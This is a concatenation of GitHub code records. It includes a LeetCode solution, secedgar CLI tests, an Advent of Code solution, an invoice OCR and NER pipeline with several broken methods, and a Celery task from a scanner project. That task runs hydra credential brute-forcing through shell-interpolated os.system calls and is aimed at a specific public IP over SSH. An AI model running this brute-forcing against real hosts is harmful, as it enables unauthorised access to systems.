scrape()\n","repo_name":"biglocalnews/warn-scraper","sub_path":"warn/scrapers/va.py","file_name":"va.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"} +{"seq_id":"18973875629","text":"class Solution:\n def findMaxConsecutiveOnes(self, nums) -> int:\n \n count = 0\n res = 0\n \n for num in nums:\n if num == 1:\n count += 1\n res = max(res, count)\n else:\n count = 0 \n return res\n\ns = Solution()\nnums = [0, 1, 0, 1, 1, 1]\nprint(s.findMaxConsecutiveOnes(nums))","repo_name":"miayuxin/leetcode","sub_path":"No.485_Max Consecutive Ones.py","file_name":"No.485_Max Consecutive Ones.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"28890280706","text":"import pytest\n\nfrom click.testing import CliRunner\nfrom secedgar.cli import filing, daily\nfrom secedgar.utils.exceptions import FilingTypeError\n\n\nclass CLITestingMixin:\n \"\"\"CLI testing utilities mixin class.\"\"\"\n\n def __init__(self, cli):\n self.cli = cli\n\n def run_cli_command(self, user_input, tmp_data_directory):\n runner = CliRunner()\n user_input = user_input + \" --directory {}\".format(tmp_data_directory)\n return runner.invoke(self.cli, user_input)\n\n def test_bad_inputs(self, user_input, expected_exception, tmp_data_directory):\n # SystemExit does not raise exception by runner\n if expected_exception is SystemExit:\n result = self.run_cli_command(user_input, tmp_data_directory)\n assert result.exit_code != 0\n else:\n with pytest.raises(expected_exception):\n self.run_cli_command(user_input, tmp_data_directory)\n\n\nclass TestCLIFiling(CLITestingMixin):\n\n def __init__(self):\n super().__init__(cli=filing)\n\n @pytest.mark.parametrize(\n \"user_input,expected_exception\",\n [\n (\"-l aapl msft Facebook\", SystemExit), # missing filing type\n (\"-l aapl -t null\", FilingTypeError), # unrecognized filing type\n (\"-l aapl -t FILING_10Q -n abc\", SystemExit), # count is not int\n (\"-l aapl -t FILING_10Q -n 0\", ValueError) # no filings available if 0 picked\n ]\n )\n def test_filing_bad_inputs(self, user_input, expected_exception, tmp_data_directory):\n self.test_bad_inputs(user_input, expected_exception, tmp_data_directory)\n\n @pytest.mark.parametrize(\n \"user_input\",\n [\n \"-l aapl msft fb FILING_10Q\",\n \"-l aapl msft fb FILING_10Q -n 10\",\n \"-l aapl msft fb FILING_10Q -n 1\"\n ]\n )\n def test_multiple_companies_input(self, user_input, tmp_data_directory):\n pass\n\n\nclass TestCLIDaily(CLITestingMixin):\n\n def __init__(self, cli):\n super().__init__(cli=daily)\n\n @pytest.mark.parametrize(\n \"user_input,expected_exception\",\n [\n (\"\", SystemExit),\n (\"-d 2020\", SystemExit)\n ]\n )\n def test_daily_bad_inputs(self, user_input, expected_exception, tmp_data_directory):\n self.test_bad_inputs(user_input, expected_exception, tmp_data_directory)\n","repo_name":"sn0wfree/sec-edgar","sub_path":"secedgar/tests/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"25136210921","text":"import aocd\nimport sys\n\nfrom collections import defaultdict, Counter\nfrom functools import reduce\n\nDEBUG = False\n\n# Eager evaluation makes this easier\nlmap = lambda x, y: list(map(x, y))\nlfilter = lambda x, y: list(filter(x, y))\ntzip = lambda *x: list(zip(x))\n\n\ndef get_input():\n if len(sys.argv) == 1:\n return aocd.get_data(day=14).split(\"\\n\")\n else:\n with open(\"input\", \"r\") as filey:\n return lmap(lambda x: x.strip(), filey)\n\n\ndef transformed_input():\n g = get_input()\n return g[0], lmap(lambda x: tuple(x.split(\" -> \")), g[2:])\n\n\ndef make_map(subs):\n return {x[0]: x[1] for x in subs}\n\n\ndef turn(string_pairs, dictionary, char_count):\n for (x, y), count in list(string_pairs.copy().items())[:]:\n key = dictionary.get(x + y)\n if DEBUG:\n print(key)\n if not key:\n continue\n string_pairs[(x, y)] -= count\n string_pairs[(x, key)] += count\n string_pairs[(key, y)] += count\n char_count[key] += count\n\n\ndef solution():\n string, dictionary = transformed_input()\n dictionary = make_map(dictionary)\n string_pairs = zip(list(string), list(string[1:]))\n if DEBUG:\n print(\"String Pairs: \", string_pairs)\n count = Counter(list(string))\n if DEBUG:\n print(count)\n pair_counter = Counter(string_pairs)\n if DEBUG:\n print(\"Pair Counter: \", pair_counter)\n for i in range(40):\n turn(pair_counter, dictionary, count)\n if DEBUG:\n print(\"Pair Counter: \", pair_counter)\n if DEBUG:\n print(\"Count: \", count)\n count += Counter()\n if DEBUG:\n print(\"Count: \", count)\n return count.most_common()[0][1] - count.most_common()[-1][1]\n\n\nif __name__ == \"__main__\":\n print(solution())\n\"\"\"\nabcd\nab -> e\nbc -> f\ncd -> g\n\nStart\n[ab] = 1\n[bc] = 1\n[cd] = 1\n\n[ab]--\n[ae]++\n[eb]++\n...\n\n\nababab\nab -> c\nba -> d\nacbdacbdacb\n[ab] = 3\n[ba] = 2\n[ab] -= 3\n[ac] += 3\n[cb] += 3\n[bd] += 2\n[da] += 2\n\n\n\n\"\"\"\n","repo_name":"justinba1010/aoc2021","sub_path":"2021/d14/solution2.py","file_name":"solution2.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74637478827","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 8/5/19 7:30 PM\n# @Author : Archerx\n# @Blog : https://blog.ixuchao.cn\n# @File : tasks.py\n\n'''\n爆破脚本\n'''\n\nimport os\nimport time\nimport uuid\nfrom celery_tasks.main import app\nfrom conf.global_config import HYDRADIC_SMALL, HYDRADIC_LARGE\nfrom utils.mongo_op import MongoDB\nimport json\nfrom conf.global_config import realjoin\nimport re\nfrom conf.global_config import DIC_USERNAME_FTP, DIC_USERNAME_IMAP, DIC_USERNAME_MEMCACHED, DIC_USERNAME_MONGODB, DIC_USERNAME_MYSQL, \\\n DIC_USERNAME_ORACLE, DIC_USERNAME_POP3, DIC_USERNAME_POSTGRESQL, DIC_USERNAME_RDP,DIC_USERNAME_REDIS, DIC_USERNAME_SMB,DIC_USERNAME_SMTP,\\\n DIC_USERNAME_MSSQL,DIC_USERNAME_SSH,DIC_USERNAME_SVN,DIC_USERNAME_TELNET,DIC_USERNAME_TOMCAT,DIC_USERNAME_VNC,DIC_USERNAME_WEBLOGIC,COMMON_USERNAME,USERNAME_DICT\n\n\n@app.task(bind=True, name='HydraBrute')\ndef dispatch(self, taskID, username, dict, host, port, service):\n # have fixed 任务执行成功,但是无法发送ack导致任务重复执行 amqp.exceptions.RecoverableConnectionError: connection already closed \\\n # 原因是cpu占用过高,心跳线程没有足够的cpu资源导致两次心跳包未发送rabbitmq直接关闭连接\n # http://eventlet.net/doc/modules/debug.html#eventlet.debug.hub_blocking_detection\n # 解决方法 1.降低cpu使用 2.增大rabbitmq的心跳阈值\n # 目前采取将心跳阈值增大到 600s -> 解决,目前没发现别的问题\n\n if username == \"dict\": #跑username字典\n NameDictBrute(taskID, dict, host, port, service)\n else:\n NameBrute(taskID, username, dict, host, port, service)\n\n\ndef handle_result(taskID, result, service):\n print(\"this is the begin\")\n x = result.strip('\\n').split(' ')\n if result is 's':\n _result = {\n 'redis': {\n 'service':service,\n 'port': x[0].strip('[').split(']')[0],\n 'login': '',\n 'password': ''\n }\n }\n else:\n _result = {\n x[0].strip('[').split(']')[1][1:]: {\n 'service': service,\n 'port': x[0].strip('[').split(']')[0],\n 'login': x[6].strip(),\n 'password': x[10].strip()\n }\n }\n print(_result)\n x = MongoDB()\n x.add_weak_pass_service(taskID, json.dumps(_result))\n\ndef NameBrute(taskID, username, large_or_small, host, port, service):\n '''\n 用于username已经确定的情况下\n :param taskID:\n :param username:\n :param large_or_small:\n :param host:\n :param port:\n :param service:\n :return:\n '''\n file_name = str(uuid.uuid1())\n if service in ['redis','cisio','snmp','vnc']:\n _ = os.system(\"hydra -P {} {} -s {} {} -I -o {} -f\".format(HYDRADIC_LARGE if large_or_small == \"large\" else HYDRADIC_SMALL,\n host, port, service, file_name))\n else:\n _ = os.system(\"hydra -l {} -P {} {} -s {} {} -I -o {}\".format(username, HYDRADIC_LARGE if large_or_small == \"large\" else HYDRADIC_SMALL,\n host, port, service, file_name))\n\n with open(file_name,'r') as f:\n print(f.read())\n for _ in f:\n if _.startswith('['):\n handle_result(taskID, _, service)\n os.remove(file_name)\n\ndef NameDictBrute(taskID, large_or_small, host, port, service):\n '''\n 用于username和passwd都不确定的情况\n :param taskID:\n :param large_or_small:\n :param host:\n :param port:\n :param service:\n :return:\n '''\n # he redis, adam6500, cisco, oracle-listener, s7-300, snmp and vnc modules are only using the -p or -P option, not login (-l, -L) or colon file (-C).\n file_name = str(uuid.uuid1())\n dict_name = 'dic_username_' + service + '.txt'\n username_dict = realjoin(USERNAME_DICT,dict_name)\n if service in ['redis','cisio','snmp','vnc']:\n _ = os.system(\"hydra -P {} {} -s {} {} -I -o {} -f -t 15\".format(HYDRADIC_LARGE if large_or_small == \"large\" else HYDRADIC_SMALL,\n host, port, service, file_name))\n else:\n _ = os.system(\"hydra -L {} -P {} {} -s {} {} -I -o {} -f -t 15\".format(username_dict,\n HYDRADIC_LARGE if large_or_small == \"large\" else HYDRADIC_SMALL,\n host, port, service, file_name))\n # does not support password authentication. 出现这种问题可能时关闭了密码认证,使用的秘钥认证\n print(_)\n ## TODO redis未授权访问无法解决\n ## 有些情况下不生成文件,所以这里要进行异常处理\n with open(file_name, 'r') as f:\n print(\"-------------------------------------------------\"+f.read())\n for _ in f:\n if _.startswith('['):\n handle_result(taskID, _ , service)\n\n os.remove(file_name)\n\n\n## TODO 报这种错误会死循环 [ERROR] \u0004Host '114.88.233.234' is not allowed to connect to this MySQL server\n## 参照 BruteDum方法来解决\n\n\nif __name__ == '__main__':\n # SSHBrute('sa','small','127.0.0.1','1433','mssql')\n\n # dispatch('5d7e39cd13e0dfe95c52e4cf','dict','small','127.0.0.1','6379','redis')\n dispatch('5d9af9c0774c122660fb837e','dict','small','149.129.89.190','22','ssh')\n # handle_result('5d51652fa814d0464ed543b7',\"[22][ssh] host: 127.0.0.1 login: x password: xuchao\")\n # handle_result('5d51652fa814d0464ed543b7',\"[22][aaa] host: 127.0.0.1 login: x password: xuchao\")\n\n # NameBrute('root','small','127.0.0.1','3306','mysql')\n # NameBrute('root','small','127.0.0.1','3389','rdp')\n # 另外还支持 smb pop3 telnet ftp","repo_name":"xuchaoa/WebScan","sub_path":"celery_tasks/WeakBrute/hydra/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":5848,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"37"} +{"seq_id":"31951920511","text":"import os\nimport io\nimport re\nimport fitz\nimport time\nimport sys\nimport json\nimport cv2\nimport glob\nimport joblib\nimport torch\nimport pandas as pd\nimport uvicorn\nimport tempfile\nimport string\nimport uvicorn\nimport tempfile\nimport pytesseract\nimport websockets\nimport subprocess\nimport pytesseract\nimport numpy as np\nfrom typing import List, Union\nfrom collections import OrderedDict\nfrom keras.models import load_model\nfrom keras_contrib.layers import CRF\nfrom keras_contrib.losses import crf_loss\nfrom keras.utils import pad_sequences\nfrom fastapi import FastAPI, File, UploadFile\nfrom fastapi.responses import JSONResponse\nfrom pdf2image import convert_from_path\nfrom PIL import Image\nfrom fastapi import FastAPI, File, UploadFile\nfrom fastapi.responses import JSONResponse\nfrom pdfminer.high_level import extract_text\nfrom keras_preprocessing.sequence import pad_sequences\nfrom keras_contrib.metrics import crf_viterbi_accuracy\nfrom fastapi import FastAPI, Depends, HTTPException, UploadFile, File\nfrom fastapi.security import APIKeyHeader\nfrom dotenv import load_dotenv\n\n# Load environment variables from .env file\nload_dotenv()\n\napp = FastAPI()\n\n\nclass PDFProcessor:\n def __init__(self, pdf_path, image_folder_path):\n self.pdf_path = pdf_path\n self.image_folder_path = image_folder_path\n self.pdf_images = None\n self.pages = None\n\n def convert_pdf_to_images(self):\n image_folder_name = os.path.splitext(os.path.basename(self.pdf_path))[0]\n self.image_folder_path = os.path.join(self.image_folder_path, image_folder_name)\n\n # Create the image folder if it doesn't exist\n if not os.path.exists(self.image_folder_path):\n os.makedirs(self.image_folder_path)\n\n # Convert the PDF file to JPEG images and save them to the image folder\n images = convert_from_path(self.pdf_path, dpi=300, fmt=\"jpg\")\n\n for i, image in enumerate(images):\n # Construct the filename using the PDF filename and page number\n filename = f\"{os.path.splitext(os.path.basename(self.pdf_path))[0]}_{i + 1}.jpg\"\n image_path = os.path.join(self.image_folder_path, filename)\n # Save the image to the specified path\n image.save(image_path, \"JPEG\")\n\n self.pdf_images = image_folder_name\n self.pages = len(images)\n\n\nclass YOLOv5Detector:\n def __init__(self, weights_path, conf_threshold, source_path, yolo_folder):\n self.weights_path = weights_path\n self.conf_threshold = conf_threshold\n self.source_path = source_path\n self.yolo_folder = yolo_folder\n\n def run_detection(self):\n os.chdir(self.yolo_folder)\n cmd = f\"python3 {self.yolo_folder}/detect.py --weights {self.weights_path} --conf {self.conf_threshold} --source {self.source_path} --save-txt\"\n subprocess.run(cmd, shell=True)\n\n def get_annotations(self):\n parent_folder = os.path.join(self.yolo_folder, \"runs\", \"detect\")\n subfolders = os.listdir(parent_folder)\n subfolders = [subfolder for subfolder in subfolders if subfolder != \"exp\"]\n subfolder_numbers = [\n int(subfolder.split(\"exp\")[-1])\n for subfolder in subfolders\n if \"exp\" in subfolder and subfolder.split(\"exp\")[-1].isdigit()\n ]\n\n if subfolder_numbers:\n latest_subfolder_number = max(subfolder_numbers)\n latest_subfolder = f\"exp{latest_subfolder_number}\"\n else:\n latest_subfolder = \"exp\"\n\n annotation_folder = os.path.join(parent_folder, latest_subfolder, \"labels\")\n return annotation_folder\n\n\nclass DataExtractor:\n def __init__(self, pdf_images, annotation_folder):\n self.pdf_images = pdf_images\n self.annotation_folder = annotation_folder\n\n def extract_data_v5(self, pdf_images, annotation_folder):\n customer_name, vendor_name, cvr, invoice_no, due_date = \"\", \"\", \"\", \"\", \"\"\n product_number, content_unit, product_price = [], [], []\n\n img_paths = sorted(glob.glob(pdf_images + \"/*.jpg\"))\n\n for img_path in img_paths:\n # load the image\n img = cv2.imread(img_path)\n\n coords = \"0 0.681648 0.091135 0.561917 0.090637\"\n id, x, y, w, h = map(float, coords.split())\n\n l = int((x - w / 2) * img.shape[1])\n r = int((x + w / 2) * img.shape[1])\n t = int((y - h / 2) * img.shape[0])\n b = int((y + h / 2) * img.shape[0])\n\n roi = img[t:b, l:r]\n gray = cv2.cvtColor(roi, cv2.COLOR_BGR2GRAY)\n ret, thresh = cv2.threshold(\n gray, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU\n )\n kernel = np.ones((3, 100), np.uint8)\n dilated = cv2.dilate(thresh, kernel, iterations=1)\n\n text = pytesseract.image_to_string(roi, lang=\"dan\")\n\n if \"inco København Cash & Carry A/S\" in text:\n vendor_name = \"inco København Cash & Carry A/S\"\n\n # extract the file name from img_path\n file_name = os.path.basename(img_path)\n file_name = os.path.splitext(file_name)[0]\n\n # construct the annotation_path\n annotation_path = os.path.join(annotation_folder, file_name + \".txt\")\n\n with open(annotation_path, \"r\") as f:\n data = f.readlines()\n\n sorted_data = sorted(\n data, key=lambda x: (float(x.split(\" \")[0]), float(x.split(\" \")[2]))\n )\n\n # Loop through the annotations and draw the boxes\n for dt in sorted_data:\n id, x, y, w, h = map(float, dt.split(\" \"))\n l = int((x - w / 2) * img.shape[1])\n r = int((x + w / 2) * img.shape[1])\n t = int((y - h / 2) * img.shape[0])\n b = int((y + h / 2) * img.shape[0])\n\n roi = img[t:b, l:r]\n gray = cv2.cvtColor(roi, cv2.COLOR_BGR2GRAY)\n ret, thresh = cv2.threshold(\n gray, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU\n )\n kernel = np.ones((3, 100), np.uint8)\n dilated = cv2.dilate(thresh, kernel, iterations=1)\n\n text = pytesseract.image_to_string(roi, lang=\"dan\")\n\n label = int(id)\n if label == 0:\n text = text.replace(\"”\", \"*\")\n customer_name = text.strip()\n\n elif label == 1:\n vendor_name = text.strip()\n\n elif label == 2:\n # cvr = text.strip()\n cvr_values = re.findall(r\"\\b\\d+\\b\", text)\n # Join the numeric values into a single string\n cvr = \"\".join(cvr_values)\n\n elif label == 3:\n invoice_no = text.strip()\n\n elif label == 4:\n due_date = text.strip()\n\n elif label == 5:\n product_number.extend(filter(None, text.strip().split(\"\\n\")))\n elif label == 6:\n content_unit.extend(filter(None, text.strip().split(\"\\n\")))\n\n elif label == 7:\n numeric_values = re.findall(r\"\\b\\d+(?:,\\s*\\d+)*\\b\", text)\n product_price.extend(numeric_values)\n\n print(\"product_number_len: \", len(product_number))\n print(\"product_price_len: \", len(product_price))\n return (\n customer_name,\n vendor_name,\n cvr,\n invoice_no,\n due_date,\n product_number,\n content_unit,\n product_price,\n )\n\n def extract_data_v7(self, pdf_images, annotation_folder):\n\n extracted_data = []\n invoice_date = \"\"\n quantity = []\n product_name = []\n product_total = []\n total_box = []\n total_excluding_tax = \"\"\n tax = \"\"\n total_including_tax = \"\"\n\n antal = []\n enhed = []\n\n isSpecial = False\n content_indexes = []\n\n sum = 0\n\n img_paths = sorted(glob.glob(pdf_images + \"/*.jpg\"))\n\n for img_path in img_paths:\n isOverfort = False\n\n # Read the image\n img = cv2.imread(img_path)\n\n # extract the file name from img_path\n file_name = os.path.basename(img_path)\n file_name = os.path.splitext(file_name)[0]\n\n # construct the annotation_path\n annotation_path = os.path.join(annotation_folder, file_name + \".txt\")\n\n with open(annotation_path, \"r\") as f:\n data = f.readlines()\n\n sorted_data = sorted(\n data, key=lambda x: (float(x.split(\" \")[0]), float(x.split(\" \")[2]))\n )\n\n text = pytesseract.image_to_string(img, lang=\"dan\")\n\n if \"Ordreliniertotal\" in text:\n isSpecial = True\n\n if \"Overført\" in text:\n isOverfort = True\n\n # Loop through the annotations and draw the boxes\n for dt in sorted_data:\n id, x, y, w, h = map(float, dt.split(\" \"))\n l = int((x - w / 2) * img.shape[1])\n r = int((x + w / 2) * img.shape[1])\n t = int((y - h / 2) * img.shape[0])\n b = int((y + h / 2) * img.shape[0])\n\n roi = img[t:b, l:r]\n gray = cv2.cvtColor(roi, cv2.COLOR_BGR2GRAY)\n ret, thresh = cv2.threshold(\n gray, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU\n )\n kernel = np.ones((3, 100), np.uint8)\n dilated = cv2.dilate(thresh, kernel, iterations=1)\n\n text = pytesseract.image_to_string(\n roi, config=\"--oem 3 --psm 6\", lang=\"dan\"\n )\n\n if id == 0:\n text = \" \".join(text.split(\"\\n\"))\n invoice_date = text.strip()\n\n elif id == 1:\n quantity.extend(\n line.strip() for line in text.split(\"\\n\") if line.strip()\n )\n\n elif id == 2:\n lines = text.split(\"\\n\")\n lines = [\n line.strip()\n for line in lines\n if line\n and not line.startswith(\"Subtotal\")\n and \"Overført\" not in line\n and not line.startswith(\"D-mærke\")\n ]\n product_name.extend(lines)\n\n elif id == 3:\n # product_total.extend(line.strip() for line in text.split('\\n') if line.strip())\n numeric_values = re.findall(r\"\\b\\d{1,3}(?:\\.\\d{3})*(?:,\\d+)\\b\", text)\n\n product_total.extend(numeric_values)\n\n elif id == 4:\n total_box.extend(\n line.strip() for line in text.split(\"\\n\") if line.strip()\n )\n\n # Modify the elements in total_box to only contain the numeric values\n for i, val in enumerate(total_box):\n total_box[i] = val.split()[-1]\n\n # Extract values from the modified total_box list\n total_excluding_tax = total_box[0]\n tax = total_box[1]\n total_including_tax = total_box[2]\n\n for value in quantity:\n value = value.split(\" \")\n antal.append(value[0])\n enhed.append(value[1])\n\n is_content_section = False\n\n product_name_cleaned = [line for line in product_name if not line.isupper()]\n\n if not isSpecial:\n for i, val in enumerate(product_name):\n if val == \"GRØNT\":\n # If 'GRØNT' is found, we start looking for the next product and append its index\n is_content_section = True\n next_product_index = i + 1\n\n # Check if the next product index is within the range of product_name\n while next_product_index < len(product_name):\n next_product = product_name[next_product_index]\n if next_product in product_name_cleaned:\n index_in_cleaned = product_name_cleaned.index(next_product)\n content_indexes.append(index_in_cleaned)\n next_product_index += 1\n else:\n break\n\n elif val.isupper() and is_content_section:\n # If an all uppercase item is found and we were in a content section, we stop appending indexes\n break\n\n # for prod in product_name:\n # print(prod)\n\n # print('-------------------')\n\n # for prod in product_name_cleaned:\n # print(prod)\n\n # print(content_indexes)\n\n extracted_data = (\n invoice_date,\n antal,\n enhed,\n product_name,\n product_total,\n total_excluding_tax,\n tax,\n total_including_tax,\n content_indexes,\n )\n\n print(\"product_name_len: \", len(product_name))\n print(\"product_total_len: \", len(product_total))\n print(\"antal_len: \", len(antal))\n print(\"enhed_len: \", len(enhed))\n\n return extracted_data\n\n def get_combined_data(self, extracted_data_v5, extracted_data_v7, pages, nlp_output):\n (\n customer_name,\n vendor_name,\n cvr,\n invoice_no,\n due_date,\n product_numbers,\n content_unit,\n product_price,\n ) = extracted_data_v5\n (\n invoice_date,\n antal,\n enhed,\n product_name,\n product_total,\n total_excluding_tax,\n tax,\n total_including_tax,\n _,\n ) = extracted_data_v7\n\n result = {\n \"invoice_number\": invoice_no,\n \"invoice_date\": invoice_date,\n \"due_date\": due_date,\n \"total_pages\": pages,\n \"sub_total\": total_excluding_tax,\n \"vat\": tax,\n \"total\": total_including_tax,\n \"vendor\": {\n \"name\": vendor_name,\n \"cvr\": cvr,\n \"address\": None,\n \"email\": None,\n },\n \"company\": {\n \"id\": None,\n \"name\": customer_name,\n \"cvr\": cvr,\n \"address\": None,\n \"email\": None,\n },\n \"products\": [],\n }\n try:\n for i in range(len(product_numbers)):\n product = {\n \"product_number\": product_numbers[i],\n \"product_desc\": nlp_output[i],\n \"antal\": antal[i],\n \"enhed\": enhed[i],\n \"content_unit\": content_unit[i],\n \"price\": product_price[i],\n \"total\": product_total[i],\n }\n result[\"products\"].append(product)\n except:\n print(\"Error in creating products\")\n pass\n\n return result\n\n\nclass NERModel:\n def __init__(self, model_path, word2idx_path, tag2idx_path):\n self.model_path = model_path\n self.word2idx_path = word2idx_path\n self.tag2idx_path = tag2idx_path\n\n self.max_len = 1000\n self.model = None\n self.word2idx = None\n self.tag2idx = None\n\n def load_model(self):\n self.model = load_model(\n self.model_path,\n custom_objects={\"CRF\": CRF, \"crf_loss\": crf_loss, \"crf_viterbi_accuracy\": crf_viterbi_accuracy},\n )\n\n with open(self.word2idx_path, \"rb\") as f:\n self.word2idx = joblib.load(f)\n\n with open(self.tag2idx_path, \"rb\") as f:\n self.tag2idx = joblib.load(f)\n\n word2idx = {w: i + 1 for i, w in enumerate(words)}\n tag2idx = {t: i for i, t in enumerate(tags)}\n idx2tag = {i: w for w, i in tag2idx.items()}\n\n def test_sentence_sample(test_sentence):\n results = []\n x_test_sent = pad_sequences(\n sequences=[[word2idx.get(w, 0) for w in tokenize(test_sentence)]],\n padding=\"post\",\n value=0,\n maxlen=max_len,\n )\n p = model_predict.predict(np.array([x_test_sent[0]]))\n p = np.argmax(p, axis=-1)\n for w, pred in zip(tokenize(test_sentence), p[0]):\n results.append([w, tags[pred]])\n return results\n\n def tokenize(s):\n if isinstance(s, (list, tuple)):\n s = \"\\n\".join(map(str, s))\n return s.split(\"\\n\")\n\n def remove_empty_lines(self, text):\n lines = text.split(\"\\n\")\n non_empty_lines = [line for line in lines if line.strip()]\n return \"\\n\".join(non_empty_lines)\n\n def process_text(self, text):\n lines = text.split(\"\\n\")\n processed_lines = []\n\n for line in lines:\n\n line = re.sub(r'\\s+', ' ', line)\n\n if \" f \" in line:\n regex = r\" f (.+)\"\n match = re.search(regex, line)\n if match:\n processed_lines.append(line.replace(\" f \" + match.group(1), \"\"))\n processed_lines.append(match.group(1))\n else:\n processed_lines.append(line)\n elif line.startswith(\"f \"):\n regex = r\"f (.+)\"\n match = re.search(regex, line)\n if match:\n processed_lines.append(\"\")\n processed_lines.append(match.group(1))\n else:\n processed_lines.append(line)\n\n elif re.match(r\"^\\s*ø (.+)\", line):\n regex = r\"ø (.+)\"\n match = re.search(regex, line)\n if match:\n processed_lines.append(match.group(1))\n\n\n elif \"fø \" in line:\n regex = r\"fø (.+)\"\n match = re.search(regex, line)\n if match:\n processed_lines.append(\"\")\n processed_lines.append(match.group(1))\n else:\n processed_lines.append(line)\n # Add more conditions here...\n elif re.search(r\"\\s(?:f|ø|fø)\\s\", line):\n regex = r\"\\s(?:f|ø|fø)\\s(.+)\"\n match = re.search(regex, line)\n if match:\n processed_lines.append(line.replace(match.group(0), \"\"))\n processed_lines.append(match.group(1))\n else:\n processed_lines.append(line)\n elif re.search(r\"^\\d+\\s[A-Z]+\\s\", line):\n regex = r\"^(\\d+\\s[A-Z]+\\s)(.*)\"\n match = re.search(regex, line)\n if match:\n processed_lines.append(match.group(1))\n processed_lines.append(match.group(2))\n else:\n processed_lines.append(line)\n elif \" ÆSK \" in line:\n regex = r\" ÆSK (.+)\"\n match = re.search(regex, line)\n if match:\n processed_lines.append(line.replace(\" ÆSK \" + match.group(1), \"\"))\n processed_lines.append(match.group(1))\n else:\n processed_lines.append(line)\n elif \" SÆK \" in line:\n regex = r\" SÆK (.+)\"\n match = re.search(regex, line)\n if match:\n processed_lines.append(line.replace(\" SÆK \" + match.group(1), \"\"))\n processed_lines.append(match.group(1))\n else:\n processed_lines.append(line)\n # Skip lines starting with numeric value and space, or containing only uppercase text\n elif re.match(r\"^\\d+\\s[A-ZÆØÅÉÆØÅa-z0-9\\s\\-!@#$%^&*()_+=[\\]{}|;:'\\\",.<>?/\\\\]+\", line):\n continue\n # Skip lines containing only numeric values with length less than 4\n elif line.isdigit() and len(line) < 4:\n continue\n # Skip lines starting with numeric value containing dot, comma, or both\n elif re.match(r\"^-?\\d+[,.]\\d+\", line):\n continue\n # Skip lines starting with \"D-mærke\"\n elif line.startswith(\"D-mærke\"):\n continue\n elif line in [\"D\", \"f\", \"ø\", \"fø\"]:\n continue\n elif re.match(r\"^-\", line):\n continue\n elif \"Subtotal\" == line:\n continue\n elif re.match(r\"^\\.\\s*\\.\\s*\\.\\s*\\.\\s*\\.\\s*\\.\\s*\\.\\s*\\.$\", line):\n continue\n else:\n processed_lines.append(line)\n return processed_lines\n\n def extract_lines_with_condition(self, lines):\n processed_lines = []\n start_extraction = False\n\n for line in lines:\n if \"Varenr.\" in line:\n start_extraction = True\n if start_extraction and \"subtotal\" in line:\n break\n if start_extraction and re.match(r\"^-?\\d+\\s[A-Z]+\", line):\n continue\n if re.match(r\"^[A-ZÆØÅÉ]+$\", line):\n continue\n if start_extraction:\n processed_lines.append(line)\n\n return processed_lines\n\n def extract_products_faktura(lines):\n processed_lines = []\n extract_next_line = False\n\n for line in lines:\n if not line.strip(): # Skip empty lines\n continue\n if re.match(r\"^\\d{4,6}$\", line) and '.' not in line and ',' not in line:\n extract_next_line = True\n elif extract_next_line:\n processed_lines.append(line)\n extract_next_line = False\n return processed_lines\n\n def extract_products_kreditnota(lines):\n processed_lines = []\n previous_line = None\n\n for line in lines:\n if re.match(r\"^\\d{4,6}$\", line) and '.' not in line and ',' not in line:\n if previous_line is not None:\n processed_lines.append(previous_line)\n previous_line = None\n else:\n previous_line = line\n\n if not line.strip(): # Skip empty lines\n continue\n\n previous_line = line\n\n return processed_lines\n\n def split_text_into_lines(text):\n lines = text.splitlines()\n non_empty_lines = [line for line in lines if line.strip()]\n return non_empty_lines\n\n def split_text(lines):\n return lines.split()\n\n def product_extraction(pdf_path):\n full_processed_text = \"\"\n with fitz.open(pdf_path) as pdf:\n for page_number in range(pdf.page_count):\n page = pdf.load_page(page_number)\n page_text = page.get_text()\n\n page_text_cleaned = page_text.replace(\"�\", \" \")\n processed_text = process_text(page_text_cleaned)\n trimmed_text = extract_lines_with_condition(processed_text)\n if \"Kreditnota\" not in page_text:\n products_faktura = extract_products_faktura(trimmed_text)\n if \"Kreditnota\" in page_text:\n products_kreditnota = extract_products_kreditnota(trimmed_text)\n\n products = products_kreditnota if \"Kreditnota\" in page_text else products_faktura\n\n processed_text_as_string = \"\\n\".join(products)\n\n full_processed_text += processed_text_as_string + \"\\n\"\n\n return full_processed_text\n\n def pdf_to_model_predictions(pdf_path):\n predictions = []\n with fitz.open(pdf_path) as pdf:\n for page_number in range(pdf.page_count):\n page = pdf.load_page(page_number)\n page_text = page.get_text()\n\n page_text_cleaned = page_text.replace(\"�\", \" \")\n text_tokens = split_text(page_text_cleaned)\n page_predictions = test_sentence_sample(text_tokens)\n predictions.extend(page_predictions)\n\n return predictions\n\n def post_processing(predictions):\n descriptions = []\n for text, tag in predictions:\n if tag in [\"B-BESKRIVELSE\", \"I-BESKRIVELSE\"]:\n descriptions.append(text)\n return descriptions\n\n def results_post_processing(data):\n descriptions = []\n buffer = []\n\n for entry in data:\n if entry[1] == 'B-BESKRIVELSE':\n if buffer:\n descriptions.append(' '.join(buffer))\n buffer = []\n buffer.append(entry[0])\n elif entry[1] == 'I-BESKRIVELSE':\n buffer.append(entry[0])\n if buffer:\n descriptions.append(' '.join(buffer))\n\n return descriptions\n\n\nclass PDFAPI:\n def __init__(self):\n self.pdf_processor = None\n self.yolov5_detector = None\n self.yolov7_detector = None\n self.data_extractor = None\n self.ner_model = None\n\n def process_pdf(self, pdf_path, image_folder_path):\n self.pdf_processor = PDFProcessor(pdf_path, image_folder_path)\n self.pdf_processor.convert_pdf_to_images()\n\n def run_yolo_detection(self, v5weights_path, v7weights_path, conf_threshold, yolo_folder):\n self.yolov5_detector = YOLOv5Detector(v5weights_path, conf_threshold, self.pdf_processor.pdf_images,\n yolo_folder)\n self.yolov7_detector = 